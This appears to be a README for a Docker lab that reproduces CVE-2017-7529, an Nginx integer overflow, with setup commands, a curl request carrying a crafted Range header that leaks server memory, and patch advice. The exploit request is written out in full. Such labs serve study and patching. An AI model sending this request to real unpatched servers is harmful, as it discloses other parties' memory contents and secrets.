
Docker-based reproduction environment for CVE-2017-7529 Nginx integer overflow vulnerability, demonstrating information disclosure via crafted Range headers with step-by-step exploitation guide.
Nginx is an open-source web server widely used as a high-performance web server, reverse proxy, cache server, and more.
In Nginx versions up to 1.13.2, an integer overflow vulnerability exists that allows an attacker to manipulate the Range header and leak memory fragments or sensitive information beyond the original response range.
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
This vulnerability can cause information disclosure with just a simple HTTP request.
If sensitive configuration information or other leakable data is included, it can lead to a serious security incident.
Patch: Upgrading to Nginx 1.13.3 or later is recommended.
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- 본 문서